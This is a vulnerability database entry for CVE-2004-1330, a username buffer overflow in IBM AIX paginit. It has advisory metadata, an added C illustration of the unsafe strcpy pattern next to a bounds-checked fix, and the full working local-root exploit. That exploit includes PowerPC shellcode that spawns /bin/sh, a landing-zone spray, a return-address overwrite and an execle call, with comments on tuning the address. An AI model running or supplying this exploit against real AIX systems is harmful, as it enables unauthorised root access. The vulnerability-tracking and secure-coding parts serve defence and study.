IBM AIX paginit Local Buffer Overflow Vulnerability

Vulnerability ID: 1108380
Vulnerability type: Buffer overflow
Published: 2004-12-20
Updated: 2005-10-20
CVE ID: CVE-2004-1330
CNNVD ID: CNNVD-200412-316
Platform: AIX
CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/699
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-316
|Details
A buffer overflow exists in paginit on AIX 5.1 through 5.3. A local user can execute arbitrary code by passing an over-long username on the paginit command line; the exploit below and the Bugtraq posting listed under References treat it as a local root vulnerability, which matches the CVSS score of 7.2. IBM tracks the fix under APARs IY64522, IY64358 and IY64312.
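The bug class described above, as an added illustration: this is not paginit's source (IBM has not published it) and not code from the original page. It models a hypothetical setuid program that copies its username argument into a fixed-size stack buffer with no length check, next to a version that refuses anything that does not fit. The buffer size, function names and the sample names are assumptions.

```c
/* Illustration of the CVE-2004-1330 bug class, not paginit's real code. */
#include <stdio.h>
#include <string.h>

#define USERNAME_BUF 64   /* hypothetical size of the on-stack username buffer */

/* Constructed over-long name (70 bytes) for the demonstration below. */
static const char long_name_sample[] =
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

/* Vulnerable pattern: strcpy with no bound. Any name of USERNAME_BUF
 * bytes or more runs past 'user' into whatever the compiler placed
 * after it (saved registers, return address), exactly the situation
 * the paginit exploit drives with a 8000-byte argv[1]. */
static int vulnerable_copy_user(const char *name)
{
    char user[USERNAME_BUF];
    strcpy(user, name);                  /* stack overflow on long input */
    return (int)strlen(user);
}

/* Hardened version: decide on the length first, fail closed if the
 * name (plus its terminator) does not fit, and only then copy. memchr
 * is used instead of strnlen so the check also works when the input
 * is not NUL-terminated within dstlen bytes. */
static int safe_copy_user(char *dst, size_t dstlen, const char *name)
{
    const char *end = memchr(name, '\0', dstlen);
    if (end == NULL)                     /* too long, or not terminated */
        return -1;
    memcpy(dst, name, (size_t)(end - name) + 1);
    return (int)(end - name);
}

/* Would the unchecked copy overflow a buffer of 'buflen' bytes? */
static int would_overflow(const char *name, size_t buflen)
{
    return memchr(name, '\0', buflen) == NULL;
}

int main(int argc, char **argv)
{
    char user[USERNAME_BUF];
    const char *name = argc > 1 ? argv[1] : "alice";   /* constructed default */

    if (safe_copy_user(user, sizeof user, name) < 0) {
        fprintf(stderr, "username too long (max %d bytes)\n", USERNAME_BUF - 1);
        return 1;
    }
    /* Only reached for names that fit, so the unchecked copy is safe here. */
    printf("user=%s (%d bytes)\n", user, vulnerable_copy_user(user));
    return 0;
}
```

Running it with a 70-byte argument takes the error path; the unchecked function would instead have written six bytes past the buffer, and on a setuid binary that is the whole vulnerability.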
|Exploit
/* exploit for /usr/bin/paginit
   tested on: AIX 5.2

   if the exploit fails it's because the shellcode
   ends up at a different address. use dbx to check,
   and change RETADDR accordingly.

   cees-bart <ceesb cs ru nl>
*/

#include <string.h>
#include <unistd.h>

/* Guessed stack address of the landing zone inside the environment
   string; adjust after checking with dbx. Contains no zero byte, so it
   survives being embedded in the username string. */
#define RETADDR 0x2ff22c90

/* AIX/PowerPC shellcode. The "\x" escapes were lost when the page was
   extracted and are restored here. The last two words are the string
   "/bin/sh\0"; its terminating byte also ends the environment string. */
char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;

/* The payload travels in the environment as X=<landing zone><shellcode>. */
char envlabel[] = "X=";

/* Store x as four big-endian bytes, the PowerPC byte order. */
void printint(char* buf, int x) {
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
  char *env[3];
  char code[1000];   /* environment string carrying the shellcode */
  char buf[8000];    /* over-long username passed as argv[1] */
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);

  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel,sizeof(envlabel)-1);
  // landing zone: the first shellcode word (xor. r5,r5,r5) repeated,
  // so any word-aligned hit inside the zone slides into the real code
  // at the end of the string. The bound keeps the last 4-byte write
  // inside code[] (the original loop ran 3 bytes past it).
  for(i=code+sizeof(envlabel)+offset1; i+4<=code+sizeof(code); i+=4)
    printint(i, 0x7ca52a79);

  memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
  code[sizeof(code)-1] = 0;

  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf)-1] = 0;

  p = buf;
  p += 4114;
  printint(p,RETADDR); // try to hit the landingzone
  p += 72;
  printint(p, RETADDR); // any readable address (apparently not overwritten)

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, (char *)0, env);
  return 1; /* only reached if execle fails */
}

// milw0rm.com [2004-12-20]
|References

Source: BID
Name: 12043
Link: http://www.securityfocus.com/bid/12043
Source: XF
Name: aix-paginit-username-bo(18618)
Link: http://xforce.iss.net/xforce/xfdb/18618
Source: www.frsirt.com
Link: http://www.frsirt.com/exploits/20041220.paginit.c.php
Source: AIXAPAR
Name: IY64522
Link: http://www-1.ibm.com/support/search.wss?rs=0&q=IY64522&apar=only
Source: AIXAPAR
Name: IY64358
Link: http://www-1.ibm.com/support/search.wss?rs=0&q=IY64358&apar=only
Source: AIXAPAR
Name: IY64312
Link: http://www-1.ibm.com/support/search.wss?rs=0&q=IY64312&apar=only
Source: BUGTRAQ
Name: 20041220 AIX 5.1/5.2/5.3 local root exploits
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110355931920123&w=2
